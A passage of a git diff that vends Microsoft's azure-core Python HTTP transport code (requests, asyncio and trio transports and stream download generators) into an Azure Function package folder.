next(iterator) + except StopIteration: + raise _ResponseStopIteration() + + +class AsyncHttpResponse(_HttpResponseBase): # pylint: disable=abstract-method + """An AsyncHttpResponse ABC. 
+ + Allows for the asynchronous streaming of data from the response. + """ + + def stream_download(self, pipeline, **kwargs) -> AsyncIteratorType[bytes]: + """Generator for streaming response body data. + + Should be implemented by sub-classes if streaming download + is supported. Will return an asynchronous generator. + + :param pipeline: The pipeline object + :type pipeline: azure.core.pipeline.Pipeline + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + + def parts(self) -> AsyncIterator: + """Assuming the content-type is multipart/mixed, will return the parts as an async iterator. + + :rtype: AsyncIterator + :raises ValueError: If the content is not multipart/mixed + """ + if not self.content_type or not self.content_type.startswith("multipart/mixed"): + raise ValueError( + "You can't get parts if the response is not multipart/mixed" + ) + + return _PartGenerator(self, default_http_response_type=AsyncHttpClientTransportResponse) + + +class AsyncHttpClientTransportResponse(_HttpClientTransportResponse, AsyncHttpResponse): + """Create a HTTPResponse from an http.client response. + + Body will NOT be read by the constructor. Call "body()" to load the body in memory if necessary. + + :param HttpRequest request: The request. + :param httpclient_response: The object returned from an HTTP(S)Connection from http.client + """ + + +class AsyncHttpTransport( + AbstractAsyncContextManager, + abc.ABC, + Generic[HTTPRequestType, AsyncHTTPResponseType] +): + """An http sender ABC. + """ + + @abc.abstractmethod + async def send(self, request, **kwargs): + """Send the request using this HTTP sender. + """ + + @abc.abstractmethod + async def open(self): + """Assign new session if one does not already exist.""" + + @abc.abstractmethod + async def close(self): + """Close the session if it is not externally owned.""" + + async def sleep(self, duration): + await asyncio.sleep(duration) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_requests_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_requests_async.py new file mode 100644 index 0000000..cf23634 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_requests_async.py @@ -0,0 +1,48 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+
+from ._requests_basic import RequestsTransport
+from ._base_async import AsyncHttpTransport
+
+class RequestsAsyncTransportBase(RequestsTransport, AsyncHttpTransport):
+    async def _retrieve_request_data(self, request):
+        if hasattr(request.data, '__aiter__'):
+            # Need to consume that async generator, since requests can't do anything with it
+            # That's not ideal, but a list is our only choice. Memory is not optimal here,
+            # but providing an async generator to a requests-based transport is not optimal either.
+            new_data = []
+            async for part in request.data:
+                new_data.append(part)
+            data_to_send = iter(new_data)
+        else:
+            data_to_send = request.data
+        return data_to_send
+
+    async def __aenter__(self):
+        return super(RequestsAsyncTransportBase, self).__enter__()
+
+    async def __aexit__(self, *exc_details):  # pylint: disable=arguments-differ
+        return super(RequestsAsyncTransportBase, self).__exit__()
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_bigger_block_size_http_adapters.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_bigger_block_size_http_adapters.py
new file mode 100644
index 0000000..dd5af6c
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_bigger_block_size_http_adapters.py
@@ -0,0 +1,47 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the ""Software""), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+
+import sys
+from requests.adapters import HTTPAdapter
+
+
+class BiggerBlockSizeHTTPAdapter(HTTPAdapter):
+    def get_connection(self, url, proxies=None):
+        """Returns a urllib3 connection for the given URL. This should not be
+        called from user code, and is only exposed for use when subclassing the
+        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
+
+        :param url: The URL to connect to.
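A hedged sketch of mounting this adapter on a plain requests session, mirroring what RequestsTransport does later in this patch:

    import requests

    session = requests.Session()
    session.mount("https://", BiggerBlockSizeHTTPAdapter())  # 32768-byte blocksize on Python 3.7+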
+ :param proxies: (optional) A Requests-style dictionary of proxies used on this request. + :rtype: urllib3.ConnectionPool + """ + conn = super(BiggerBlockSizeHTTPAdapter, self).get_connection(url, proxies) + system_version = tuple(sys.version_info)[:3] + if system_version[:2] >= (3, 7): + if not conn.conn_kw: + conn.conn_kw = {} + conn.conn_kw['blocksize'] = 32768 + return conn diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_asyncio.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_asyncio.py new file mode 100644 index 0000000..8f7f4b5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_asyncio.py @@ -0,0 +1,257 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
+# +# -------------------------------------------------------------------------- +import asyncio +from collections.abc import AsyncIterator +import functools +import logging +from typing import ( + Any, Optional, AsyncIterator as AsyncIteratorType, TYPE_CHECKING, overload +) +import urllib3 # type: ignore + +import requests + +from azure.core.exceptions import ( + ServiceRequestError, + ServiceResponseError, + IncompleteReadError, + HttpResponseError, +) +from azure.core.pipeline import Pipeline +from ._base import HttpRequest +from ._base_async import ( + AsyncHttpResponse, + _ResponseStopIteration, + _iterate_response_content) +from ._requests_basic import RequestsTransportResponse, _read_raw_stream, AzureErrorUnion +from ._base_requests_async import RequestsAsyncTransportBase +from .._tools import is_rest as _is_rest +from .._tools_async import handle_no_stream_rest_response as _handle_no_stream_rest_response + +if TYPE_CHECKING: + from ...rest import ( + HttpRequest as RestHttpRequest, + AsyncHttpResponse as RestAsyncHttpResponse + ) + +_LOGGER = logging.getLogger(__name__) + + +def _get_running_loop(): + try: + return asyncio.get_running_loop() + except AttributeError: # 3.5 / 3.6 + loop = asyncio._get_running_loop() # pylint: disable=protected-access, no-member + if loop is None: + raise RuntimeError('No running event loop') + return loop + + +#pylint: disable=too-many-ancestors +class AsyncioRequestsTransport(RequestsAsyncTransportBase): + """Identical implementation as the synchronous RequestsTransport wrapped in a class with + asynchronous methods. Uses the built-in asyncio event loop. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START asyncio] + :end-before: [END asyncio] + :language: python + :dedent: 4 + :caption: Asynchronous transport with asyncio. + """ + async def __aenter__(self): + return super(AsyncioRequestsTransport, self).__enter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + return super(AsyncioRequestsTransport, self).__exit__() + + async def sleep(self, duration): # pylint:disable=invalid-overridden-method + await asyncio.sleep(duration) + + @overload # type: ignore + async def send(self, request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse: # pylint:disable=invalid-overridden-method + """Send the request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + @overload # type: ignore + async def send(self, request: "RestHttpRequest", **kwargs: Any) -> "RestAsyncHttpResponse": # pylint:disable=invalid-overridden-method + """Send a `azure.core.rest` request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.rest.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.rest.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. 
Proxy is a dict (protocol, url) + """ + + async def send(self, request, **kwargs): # pylint:disable=invalid-overridden-method + """Send the request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + self.open() + loop = kwargs.get("loop", _get_running_loop()) + response = None + error = None # type: Optional[AzureErrorUnion] + data_to_send = await self._retrieve_request_data(request) + try: + response = await loop.run_in_executor( + None, + functools.partial( + self.session.request, + request.method, + request.url, + headers=request.headers, + data=data_to_send, + files=request.files, + verify=kwargs.pop('connection_verify', self.connection_config.verify), + timeout=kwargs.pop('connection_timeout', self.connection_config.timeout), + cert=kwargs.pop('connection_cert', self.connection_config.cert), + allow_redirects=False, + **kwargs)) + response.raw.enforce_content_length = True + + except urllib3.exceptions.NewConnectionError as err: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ReadTimeout as err: + error = ServiceResponseError(err, error=err) + except requests.exceptions.ConnectionError as err: + if err.args and isinstance(err.args[0], urllib3.exceptions.ProtocolError): + error = ServiceResponseError(err, error=err) + else: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + error = IncompleteReadError(err, error=err) + else: + _LOGGER.warning("Unable to stream download: %s", err) + error = HttpResponseError(err, error=err) + except requests.RequestException as err: + error = ServiceRequestError(err, error=err) + + if error: + raise error + if _is_rest(request): + from azure.core.rest._requests_asyncio import RestAsyncioRequestsTransportResponse + retval = RestAsyncioRequestsTransportResponse( + request=request, + internal_response=response, + block_size=self.connection_config.data_block_size + ) + if not kwargs.get("stream"): + await _handle_no_stream_rest_response(retval) + return retval + + return AsyncioRequestsTransportResponse(request, response, self.connection_config.data_block_size) + + +class AsyncioStreamDownloadGenerator(AsyncIterator): + """Streams the response body data. + + :param pipeline: The pipeline object + :param response: The response object. + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. 
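A minimal end-to-end sketch with the asyncio transport (the URL is hypothetical):

    import asyncio
    from azure.core.pipeline.transport import AsyncioRequestsTransport, HttpRequest

    async def fetch():
        async with AsyncioRequestsTransport() as transport:
            response = await transport.send(HttpRequest("GET", "https://example.com"))
            return response.status_code

    asyncio.run(fetch())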
+ """ + def __init__(self, pipeline: Pipeline, response: AsyncHttpResponse, **kwargs) -> None: + self.pipeline = pipeline + self.request = response.request + self.response = response + self.block_size = response.block_size + decompress = kwargs.pop("decompress", True) + if len(kwargs) > 0: + raise TypeError("Got an unexpected keyword argument: {}".format(list(kwargs.keys())[0])) + internal_response = response.internal_response + if decompress: + self.iter_content_func = internal_response.iter_content(self.block_size) + else: + self.iter_content_func = _read_raw_stream(internal_response, self.block_size) + self.content_length = int(response.headers.get('Content-Length', 0)) + + def __len__(self): + return self.content_length + + async def __anext__(self): + loop = _get_running_loop() + internal_response = self.response.internal_response + try: + chunk = await loop.run_in_executor( + None, + _iterate_response_content, + self.iter_content_func, + ) + if not chunk: + raise _ResponseStopIteration() + return chunk + except _ResponseStopIteration: + internal_response.close() + raise StopAsyncIteration() + except requests.exceptions.StreamConsumedError: + raise + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + internal_response.close() + raise IncompleteReadError(err, error=err) + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise HttpResponseError(err, error=err) + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise + + +class AsyncioRequestsTransportResponse(AsyncHttpResponse, RequestsTransportResponse): # type: ignore + """Asynchronous streaming of data from the response. + """ + def stream_download(self, pipeline, **kwargs) -> AsyncIteratorType[bytes]: # type: ignore + """Generator for streaming request body data.""" + return AsyncioStreamDownloadGenerator(pipeline, self, **kwargs) # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_basic.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_basic.py new file mode 100644 index 0000000..524591d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_basic.py @@ -0,0 +1,372 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from __future__ import absolute_import +import logging +from typing import Iterator, Optional, Any, Union, TypeVar, overload, TYPE_CHECKING +import urllib3 # type: ignore +from urllib3.util.retry import Retry # type: ignore +from urllib3.exceptions import ( + DecodeError as CoreDecodeError, ReadTimeoutError, ProtocolError +) +import requests + +from azure.core.configuration import ConnectionConfiguration +from azure.core.exceptions import ( + ServiceRequestError, + ServiceResponseError, + IncompleteReadError, + HttpResponseError, + DecodeError +) +from . import HttpRequest # pylint: disable=unused-import + +from ._base import ( + HttpTransport, + HttpResponse, + _HttpResponseBase +) +from ._bigger_block_size_http_adapters import BiggerBlockSizeHTTPAdapter +from .._tools import is_rest as _is_rest, handle_non_stream_rest_response as _handle_non_stream_rest_response + +if TYPE_CHECKING: + from ...rest import HttpRequest as RestHttpRequest, HttpResponse as RestHttpResponse + +AzureErrorUnion = Union[ + ServiceRequestError, + ServiceResponseError, + IncompleteReadError, + HttpResponseError, +] + +PipelineType = TypeVar("PipelineType") + +_LOGGER = logging.getLogger(__name__) + +def _read_raw_stream(response, chunk_size=1): + # Special case for urllib3. + if hasattr(response.raw, 'stream'): + try: + for chunk in response.raw.stream(chunk_size, decode_content=False): + yield chunk + except ProtocolError as e: + raise ServiceResponseError(e, error=e) + except CoreDecodeError as e: + raise DecodeError(e, error=e) + except ReadTimeoutError as e: + raise ServiceRequestError(e, error=e) + else: + # Standard file-like object. + while True: + chunk = response.raw.read(chunk_size) + if not chunk: + break + yield chunk + + # following behavior from requests iter_content, we set content consumed to True + # https://github.com/psf/requests/blob/master/requests/models.py#L774 + response._content_consumed = True # pylint: disable=protected-access + + +class _RequestsTransportResponseBase(_HttpResponseBase): + """Base class for accessing response data. + + :param HttpRequest request: The request. + :param requests_response: The object returned from the HTTP library. + :param int block_size: Size in bytes. + """ + def __init__(self, request, requests_response, block_size=None): + super(_RequestsTransportResponseBase, self).__init__(request, requests_response, block_size=block_size) + self.status_code = requests_response.status_code + self.headers = requests_response.headers + self.reason = requests_response.reason + self.content_type = requests_response.headers.get('content-type') + + def body(self): + return self.internal_response.content + + def text(self, encoding=None): + # type: (Optional[str]) -> str + """Return the whole body as a string. + + If encoding is not provided, mostly rely on requests auto-detection, except + for BOM, that requests ignores. If we see a UTF8 BOM, we assumes UTF8 unlike requests. + + :param str encoding: The encoding to apply. 
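A short sketch of the BOM handling described above, assuming "response" is any response produced by this transport:

    body = response.text()           # a leading UTF-8 BOM switches decoding to "utf-8-sig"
    body = response.text("utf-8")    # explicit "utf-8" is also upgraded to "utf-8-sig"
    body = response.text("latin-1")  # other encodings are handed to requests unchanged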
+ """ + if not encoding: + # There is a few situation where "requests" magic doesn't fit us: + # - https://github.com/psf/requests/issues/654 + # - https://github.com/psf/requests/issues/1737 + # - https://github.com/psf/requests/issues/2086 + from codecs import BOM_UTF8 + if self.internal_response.content[:3] == BOM_UTF8: + encoding = "utf-8-sig" + + if encoding: + if encoding == "utf-8": + encoding = "utf-8-sig" + + self.internal_response.encoding = encoding + + return self.internal_response.text + + +class StreamDownloadGenerator(object): + """Generator for streaming response data. + + :param pipeline: The pipeline object + :param response: The response object. + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + def __init__(self, pipeline, response, **kwargs): + self.pipeline = pipeline + self.request = response.request + self.response = response + self.block_size = response.block_size + decompress = kwargs.pop("decompress", True) + if len(kwargs) > 0: + raise TypeError("Got an unexpected keyword argument: {}".format(list(kwargs.keys())[0])) + internal_response = response.internal_response + if decompress: + self.iter_content_func = internal_response.iter_content(self.block_size) + else: + self.iter_content_func = _read_raw_stream(internal_response, self.block_size) + self.content_length = int(response.headers.get('Content-Length', 0)) + + def __len__(self): + return self.content_length + + def __iter__(self): + return self + + def __next__(self): + internal_response = self.response.internal_response + try: + chunk = next(self.iter_content_func) + if not chunk: + raise StopIteration() + return chunk + except StopIteration: + internal_response.close() + raise StopIteration() + except requests.exceptions.StreamConsumedError: + raise + except requests.exceptions.ContentDecodingError as err: + raise DecodeError(err, error=err) + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + internal_response.close() + raise IncompleteReadError(err, error=err) + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise HttpResponseError(err, error=err) + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise + next = __next__ # Python 2 compatibility. + + +class RequestsTransportResponse(HttpResponse, _RequestsTransportResponseBase): + """Streaming of data from the response. + """ + def stream_download(self, pipeline, **kwargs): + # type: (PipelineType, **Any) -> Iterator[bytes] + """Generator for streaming request body data.""" + return StreamDownloadGenerator(pipeline, self, **kwargs) + + +class RequestsTransport(HttpTransport): + """Implements a basic requests HTTP sender. + + Since requests team recommends to use one session per requests, you should + not consider this class as thread-safe, since it will use one Session + per instance. + + In this simple implementation: + - You provide the configured session if you want to, or a basic session is created. + - All kwargs received by "send" are sent to session.request directly + + :keyword requests.Session session: Request session to use instead of the default one. + :keyword bool session_owner: Decide if the session provided by user is owned by this transport. Default to True. + :keyword bool use_env_settings: Uses proxy settings from environment. Defaults to True. 
+ + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sync.py + :start-after: [START requests] + :end-before: [END requests] + :language: python + :dedent: 4 + :caption: Synchronous transport with Requests. + """ + + _protocols = ['http://', 'https://'] + + def __init__(self, **kwargs): + # type: (Any) -> None + self.session = kwargs.get('session', None) + self._session_owner = kwargs.get('session_owner', True) + self.connection_config = ConnectionConfiguration(**kwargs) + self._use_env_settings = kwargs.pop('use_env_settings', True) + + def __enter__(self): + # type: () -> RequestsTransport + self.open() + return self + + def __exit__(self, *args): # pylint: disable=arguments-differ + self.close() + + def _init_session(self, session): + # type: (requests.Session) -> None + """Init session level configuration of requests. + + This is initialization I want to do once only on a session. + """ + session.trust_env = self._use_env_settings + disable_retries = Retry(total=False, redirect=False, raise_on_status=False) + adapter = BiggerBlockSizeHTTPAdapter(max_retries=disable_retries) + for p in self._protocols: + session.mount(p, adapter) + + def open(self): + if not self.session and self._session_owner: + self.session = requests.Session() + self._init_session(self.session) + + def close(self): + if self._session_owner and self.session: + self.session.close() + self._session_owner = False + self.session = None + + @overload + def send(self, request, **kwargs): + # type: (HttpRequest, Any) -> HttpResponse + """Send a rest request and get back a rest response. + + :param request: The request object to be sent. + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: An HTTPResponse object. + :rtype: ~azure.core.pipeline.transport.HttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + @overload + def send(self, request, **kwargs): + # type: (RestHttpRequest, Any) -> RestHttpResponse + """Send an `azure.core.rest` request and get back a rest response. + + :param request: The request object to be sent. + :type request: ~azure.core.rest.HttpRequest + :return: An HTTPResponse object. + :rtype: ~azure.core.rest.HttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + def send(self, request, **kwargs): # type: ignore + """Send request object according to configuration. + + :param request: The request object to be sent. + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: An HTTPResponse object. + :rtype: ~azure.core.pipeline.transport.HttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. 
Proxy is a dict (protocol, url) + """ + self.open() + response = None + error = None # type: Optional[AzureErrorUnion] + + try: + connection_timeout = kwargs.pop('connection_timeout', self.connection_config.timeout) + + if isinstance(connection_timeout, tuple): + if 'read_timeout' in kwargs: + raise ValueError('Cannot set tuple connection_timeout and read_timeout together') + _LOGGER.warning("Tuple timeout setting is deprecated") + timeout = connection_timeout + else: + read_timeout = kwargs.pop('read_timeout', self.connection_config.read_timeout) + timeout = (connection_timeout, read_timeout) + response = self.session.request( # type: ignore + request.method, + request.url, + headers=request.headers, + data=request.data, + files=request.files, + verify=kwargs.pop('connection_verify', self.connection_config.verify), + timeout=timeout, + cert=kwargs.pop('connection_cert', self.connection_config.cert), + allow_redirects=False, + **kwargs) + response.raw.enforce_content_length = True + + except (urllib3.exceptions.NewConnectionError, urllib3.exceptions.ConnectTimeoutError) as err: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ReadTimeout as err: + error = ServiceResponseError(err, error=err) + except requests.exceptions.ConnectionError as err: + if err.args and isinstance(err.args[0], urllib3.exceptions.ProtocolError): + error = ServiceResponseError(err, error=err) + else: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + error = IncompleteReadError(err, error=err) + else: + _LOGGER.warning("Unable to stream download: %s", err) + error = HttpResponseError(err, error=err) + except requests.RequestException as err: + error = ServiceRequestError(err, error=err) + + if error: + raise error + if _is_rest(request): + from azure.core.rest._requests_basic import RestRequestsTransportResponse + retval = RestRequestsTransportResponse( + request=request, + internal_response=response, + block_size=self.connection_config.data_block_size + ) + if not kwargs.get('stream'): + _handle_non_stream_rest_response(retval) + return retval + return RequestsTransportResponse(request, response, self.connection_config.data_block_size) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_trio.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_trio.py new file mode 100644 index 0000000..d457166 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_trio.py @@ -0,0 +1,266 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from collections.abc import AsyncIterator +import functools +import logging +from typing import ( + Any, Optional, AsyncIterator as AsyncIteratorType, TYPE_CHECKING, overload +) +import trio +import urllib3 + +import requests + +from azure.core.exceptions import ( + ServiceRequestError, + ServiceResponseError, + IncompleteReadError, + HttpResponseError, +) +from azure.core.pipeline import Pipeline +from ._base import HttpRequest +from ._base_async import ( + AsyncHttpResponse, + _ResponseStopIteration, + _iterate_response_content) +from ._requests_basic import RequestsTransportResponse, _read_raw_stream, AzureErrorUnion +from ._base_requests_async import RequestsAsyncTransportBase +from .._tools import is_rest as _is_rest +from .._tools_async import handle_no_stream_rest_response as _handle_no_stream_rest_response +if TYPE_CHECKING: + from ...rest import ( + HttpRequest as RestHttpRequest, + AsyncHttpResponse as RestAsyncHttpResponse, + ) + + +_LOGGER = logging.getLogger(__name__) + + +class TrioStreamDownloadGenerator(AsyncIterator): + """Generator for streaming response data. + + :param pipeline: The pipeline object + :param response: The response object. + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. 
+ """ + def __init__(self, pipeline: Pipeline, response: AsyncHttpResponse, **kwargs) -> None: + self.pipeline = pipeline + self.request = response.request + self.response = response + self.block_size = response.block_size + decompress = kwargs.pop("decompress", True) + if len(kwargs) > 0: + raise TypeError("Got an unexpected keyword argument: {}".format(list(kwargs.keys())[0])) + internal_response = response.internal_response + if decompress: + self.iter_content_func = internal_response.iter_content(self.block_size) + else: + self.iter_content_func = _read_raw_stream(internal_response, self.block_size) + self.content_length = int(response.headers.get('Content-Length', 0)) + + def __len__(self): + return self.content_length + + async def __anext__(self): + internal_response = self.response.internal_response + try: + try: + chunk = await trio.to_thread.run_sync( + _iterate_response_content, + self.iter_content_func, + ) + except AttributeError: # trio < 0.12.1 + chunk = await trio.run_sync_in_worker_thread( # pylint: disable=no-member + _iterate_response_content, + self.iter_content_func, + ) + if not chunk: + raise _ResponseStopIteration() + return chunk + except _ResponseStopIteration: + internal_response.close() + raise StopAsyncIteration() + except requests.exceptions.StreamConsumedError: + raise + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + internal_response.close() + raise IncompleteReadError(err, error=err) + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise 